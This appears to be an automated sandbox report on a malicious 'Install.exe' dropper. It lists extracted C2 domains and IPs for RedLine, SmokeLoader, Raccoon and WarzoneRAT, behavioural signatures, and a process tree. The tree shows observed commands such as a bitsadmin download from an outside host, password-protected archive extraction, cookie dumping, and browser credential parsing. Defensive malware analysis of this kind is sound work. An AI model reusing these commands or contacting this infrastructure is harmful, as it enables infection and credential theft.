Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1014s
  • max time network
    1019s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    28-04-2021 04:33

Errors

Reason
Machine shutdown

General

  • Target

    Install.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

redline

Botnet

EUU

C2

download3.info:80

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

1414

C2

188.119.112.16:46409

Extracted

Family

raccoon

Botnet

16992cd33145ccbb6feeacb4e84400a56448fa14

Attributes
  • url4cnc

    https://telete.in/baudemars

rc4.plain
rc4.plain

Extracted

Family

warzonerat

C2

104.207.138.207:4531

Extracted

Family

raccoon

Botnet

afefd33a49c7cbd55d417545269920f24c85aa37

Attributes
  • url4cnc

    https://telete.in/jagressor_kz

rc4.plain
rc4.plain

Extracted

Family

raccoon

Botnet

bea07c54d843fcd5517bbf13341a9e273e06979b

Attributes
  • url4cnc

    https://tttttt.me/iopioldpsergdg

rc4.plain
rc4.plain

Signatures

  • Detected facebook phishing page
  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 6 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 59 IoCs
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 9 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Program crash 1 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 15 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 48 IoCs
  • Modifies data under HKEY_USERS 30 IoCs
  • Modifies registry class 14 IoCs
  • Modifies system certificate store 2 TTPs 15 IoCs
  • NTFS ADS 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 11 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 42 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of SetWindowsHookEx 22 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:476
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        PID:876
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {A3BDF764-062D-4749-A699-DB721EE80CFC} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
          3⤵
            PID:2624
            • C:\Users\Admin\AppData\Roaming\bderrfb
              C:\Users\Admin\AppData\Roaming\bderrfb
              4⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:756
              • C:\Users\Admin\AppData\Roaming\bderrfb
                C:\Users\Admin\AppData\Roaming\bderrfb
                5⤵
                • Executes dropped EXE
                • Checks SCSI registry key(s)
                • Suspicious behavior: MapViewOfSection
                PID:2816
            • C:\Users\Admin\AppData\Roaming\hderrfb
              C:\Users\Admin\AppData\Roaming\hderrfb
              4⤵
              • Executes dropped EXE
              • Checks SCSI registry key(s)
              • Suspicious behavior: MapViewOfSection
              PID:2420
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k SystemNetworkService
          2⤵
          • Checks processor information in registry
          • Modifies data under HKEY_USERS
          • Modifies registry class
          PID:2200
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k SystemNetworkService
          2⤵
          • Drops file in System32 directory
          • Checks processor information in registry
          • Modifies data under HKEY_USERS
          • Modifies registry class
          PID:2060
      • C:\Users\Admin\AppData\Local\Temp\Install.exe
        "C:\Users\Admin\AppData\Local\Temp\Install.exe"
        1⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1028
        • C:\Users\Admin\AppData\Local\Temp\is-D5CRQ.tmp\Install.tmp
          "C:\Users\Admin\AppData\Local\Temp\is-D5CRQ.tmp\Install.tmp" /SL5="$30158,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2032
          • C:\Users\Admin\AppData\Local\Temp\is-RPQFK.tmp\Ultra.exe
            "C:\Users\Admin\AppData\Local\Temp\is-RPQFK.tmp\Ultra.exe" /S /UID=burnerch1
            3⤵
            • Drops file in Drivers directory
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious use of WriteProcessMemory
            PID:1008
            • C:\Program Files\DVD Maker\GCBHDYWULW\ultramediaburner.exe
              "C:\Program Files\DVD Maker\GCBHDYWULW\ultramediaburner.exe" /VERYSILENT
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1660
              • C:\Users\Admin\AppData\Local\Temp\is-KVN21.tmp\ultramediaburner.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-KVN21.tmp\ultramediaburner.tmp" /SL5="$5015E,281924,62464,C:\Program Files\DVD Maker\GCBHDYWULW\ultramediaburner.exe" /VERYSILENT
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops file in Program Files directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of WriteProcessMemory
                PID:1524
                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                  6⤵
                  • Executes dropped EXE
                  PID:1652
            • C:\Users\Admin\AppData\Local\Temp\0c-d1ddc-344-2efba-ace1713dbbecd\Vaeholaemaemy.exe
              "C:\Users\Admin\AppData\Local\Temp\0c-d1ddc-344-2efba-ace1713dbbecd\Vaeholaemaemy.exe"
              4⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:1340
              • C:\Program Files\Internet Explorer\iexplore.exe
                "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                5⤵
                • Modifies Internet Explorer settings
                • Suspicious behavior: GetForegroundWindowSpam
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:944
                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:944 CREDAT:275457 /prefetch:2
                  6⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of SetWindowsHookEx
                  PID:964
                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:944 CREDAT:340994 /prefetch:2
                  6⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of SetWindowsHookEx
                  PID:2204
                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:944 CREDAT:668698 /prefetch:2
                  6⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of SetWindowsHookEx
                  PID:2056
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2056 -s 1436
                    7⤵
                    • Program crash
                    • Suspicious behavior: GetForegroundWindowSpam
                    PID:920
                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:944 CREDAT:341011 /prefetch:2
                  6⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of SetWindowsHookEx
                  PID:3060
              • C:\Program Files\Internet Explorer\iexplore.exe
                "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                5⤵
                  PID:2940
              • C:\Users\Admin\AppData\Local\Temp\7f-cc110-d92-ea683-8841a12756adf\Kulaeqydotu.exe
                "C:\Users\Admin\AppData\Local\Temp\7f-cc110-d92-ea683-8841a12756adf\Kulaeqydotu.exe"
                4⤵
                • Executes dropped EXE
                • Modifies system certificate store
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1756
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5h0t2grs.vwz\skipper.exe /s & exit
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2656
                  • C:\Users\Admin\AppData\Local\Temp\5h0t2grs.vwz\skipper.exe
                    C:\Users\Admin\AppData\Local\Temp\5h0t2grs.vwz\skipper.exe /s
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                    • Suspicious use of WriteProcessMemory
                    PID:2732
                    • C:\Users\Admin\AppData\Local\Temp\626922043.exe
                      C:\Users\Admin\AppData\Local\Temp\626922043.exe
                      7⤵
                      • Executes dropped EXE
                      PID:2940
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                        8⤵
                          PID:2860
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                          8⤵
                            PID:2332
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                            8⤵
                              PID:2264
                          • C:\Users\Admin\AppData\Local\Temp\430381230.exe
                            C:\Users\Admin\AppData\Local\Temp\430381230.exe
                            7⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:2196
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                              8⤵
                                PID:2932
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\5h0t2grs.vwz\skipper.exe & exit
                              7⤵
                                PID:3040
                                • C:\Windows\SysWOW64\PING.EXE
                                  ping 0
                                  8⤵
                                  • Runs ping.exe
                                  PID:2528
                            • C:\Windows\SysWOW64\timeout.exe
                              timeout /T 10 /NOBREAK
                              6⤵
                              • Delays execution with timeout.exe
                              PID:1376
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\scnc3om5.ika\001.exe & exit
                            5⤵
                              PID:3056
                              • C:\Users\Admin\AppData\Local\Temp\scnc3om5.ika\001.exe
                                C:\Users\Admin\AppData\Local\Temp\scnc3om5.ika\001.exe
                                6⤵
                                • Executes dropped EXE
                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                PID:336
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\drrtlxzu.snf\gpooe.exe & exit
                              5⤵
                                PID:2424
                                • C:\Users\Admin\AppData\Local\Temp\drrtlxzu.snf\gpooe.exe
                                  C:\Users\Admin\AppData\Local\Temp\drrtlxzu.snf\gpooe.exe
                                  6⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Adds Run key to start application
                                  • Modifies system certificate store
                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                  PID:2492
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    7⤵
                                      PID:2556
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      7⤵
                                        PID:2784
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        7⤵
                                        • Executes dropped EXE
                                        PID:2416
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0yowucwm.vxe\google-game.exe & exit
                                    5⤵
                                      PID:2932
                                      • C:\Users\Admin\AppData\Local\Temp\0yowucwm.vxe\google-game.exe
                                        C:\Users\Admin\AppData\Local\Temp\0yowucwm.vxe\google-game.exe
                                        6⤵
                                        • Executes dropped EXE
                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                        • Suspicious use of SetWindowsHookEx
                                        PID:3012
                                        • C:\Windows\SysWOW64\rundll32.exe
                                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                          7⤵
                                          • Loads dropped DLL
                                          • Modifies registry class
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2076
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\t1pfdepx.lay\md1_1eaf.exe & exit
                                      5⤵
                                        PID:2108
                                        • C:\Users\Admin\AppData\Local\Temp\t1pfdepx.lay\md1_1eaf.exe
                                          C:\Users\Admin\AppData\Local\Temp\t1pfdepx.lay\md1_1eaf.exe
                                          6⤵
                                          • Executes dropped EXE
                                          • Modifies system certificate store
                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                          PID:1816
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vlxqz2c5.bll\askinstall39.exe & exit
                                        5⤵
                                          PID:1848
                                          • C:\Users\Admin\AppData\Local\Temp\vlxqz2c5.bll\askinstall39.exe
                                            C:\Users\Admin\AppData\Local\Temp\vlxqz2c5.bll\askinstall39.exe
                                            6⤵
                                            • Executes dropped EXE
                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2580
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /c taskkill /f /im chrome.exe
                                              7⤵
                                                PID:2996
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /f /im chrome.exe
                                                  8⤵
                                                  • Kills process with taskkill
                                                  PID:2792
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zsf5xxxg.q4o\requête.exe & exit
                                            5⤵
                                              PID:2668
                                              • C:\Users\Admin\AppData\Local\Temp\zsf5xxxg.q4o\requête.exe
                                                C:\Users\Admin\AppData\Local\Temp\zsf5xxxg.q4o\requête.exe
                                                6⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                PID:2588
                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"
                                                  7⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  PID:2948
                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                                    parse.exe -f json -b firefox
                                                    8⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    PID:2904
                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                                    parse.exe -f json -b edge
                                                    8⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    PID:2248
                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                                    parse.exe -f json -b chrome
                                                    8⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    PID:2780
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2x0akzhq.hhy\SunLabsPlayer.exe /S & exit
                                              5⤵
                                                PID:1400
                                                • C:\Users\Admin\AppData\Local\Temp\2x0akzhq.hhy\SunLabsPlayer.exe
                                                  C:\Users\Admin\AppData\Local\Temp\2x0akzhq.hhy\SunLabsPlayer.exe /S
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Drops file in Program Files directory
                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                  PID:2436
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstD693.tmp\tempfile.ps1"
                                                    7⤵
                                                      PID:2724
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstD693.tmp\tempfile.ps1"
                                                      7⤵
                                                        PID:2156
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstD693.tmp\tempfile.ps1"
                                                        7⤵
                                                          PID:1864
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstD693.tmp\tempfile.ps1"
                                                          7⤵
                                                            PID:1232
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstD693.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:2720
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstD693.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:1376
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstD693.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:1404
                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                  "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                  7⤵
                                                                  • Download via BitsAdmin
                                                                  PID:1232
                                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pLZQiSM75KRmgEsZ -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  • Drops file in Program Files directory
                                                                  PID:2916
                                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -plIt7BMSl5CGLPUK -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                  7⤵
                                                                    PID:2920
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstD693.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:2240
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstD693.tmp\tempfile.ps1"
                                                                      7⤵
                                                                      • Drops file in Program Files directory
                                                                      PID:2884
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstD693.tmp\tempfile.ps1"
                                                                      7⤵
                                                                        PID:2260
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstD693.tmp\tempfile.ps1"
                                                                        7⤵
                                                                          PID:3056
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstD693.tmp\tempfile.ps1"
                                                                          7⤵
                                                                            PID:2172
                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                            C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\HjhHaWQ\HjhHaWQ.dll" HjhHaWQ
                                                                            7⤵
                                                                              PID:1052
                                                                              • C:\Windows\system32\rundll32.exe
                                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\HjhHaWQ\HjhHaWQ.dll" HjhHaWQ
                                                                                8⤵
                                                                                • Drops file in System32 directory
                                                                                PID:1248
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstD693.tmp\tempfile.ps1"
                                                                              7⤵
                                                                                PID:2704
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstD693.tmp\tempfile.ps1"
                                                                                7⤵
                                                                                  PID:2572
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstD693.tmp\tempfile.ps1"
                                                                                  7⤵
                                                                                    PID:3048
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstD693.tmp\tempfile.ps1"
                                                                                    7⤵
                                                                                    • Drops file in Program Files directory
                                                                                    PID:2788
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstD693.tmp\tempfile.ps1"
                                                                                    7⤵
                                                                                    • Drops file in Program Files directory
                                                                                    PID:2708
                                                                                  • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                    "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Drops file in Program Files directory
                                                                                    PID:2568
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hf3moooh.1z5\005.exe & exit
                                                                                5⤵
                                                                                  PID:2120
                                                                                  • C:\Users\Admin\AppData\Local\Temp\hf3moooh.1z5\005.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\hf3moooh.1z5\005.exe
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                    PID:2936
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vfbmpe0r.i0r\toolspab1.exe & exit
                                                                                  5⤵
                                                                                    PID:2364
                                                                                    • C:\Users\Admin\AppData\Local\Temp\vfbmpe0r.i0r\toolspab1.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\vfbmpe0r.i0r\toolspab1.exe
                                                                                      6⤵
                                                                                        PID:3064
                                                                                        • C:\Users\Admin\AppData\Local\Temp\vfbmpe0r.i0r\toolspab1.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\vfbmpe0r.i0r\toolspab1.exe
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • Checks SCSI registry key(s)
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:2500
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\agyzo5bj.izj\c7ae36fa.exe & exit
                                                                                      5⤵
                                                                                        PID:2984
                                                                                        • C:\Users\Admin\AppData\Local\Temp\agyzo5bj.izj\c7ae36fa.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\agyzo5bj.izj\c7ae36fa.exe
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • Checks SCSI registry key(s)
                                                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:344
                                                                              • C:\Windows\system32\conhost.exe
                                                                                \??\C:\Windows\system32\conhost.exe "201689511160619101911720810861998965902-1736462286-158488306518752452791091063079"
                                                                                1⤵
                                                                                • Loads dropped DLL
                                                                                PID:2792
                                                                              • C:\Windows\system32\conhost.exe
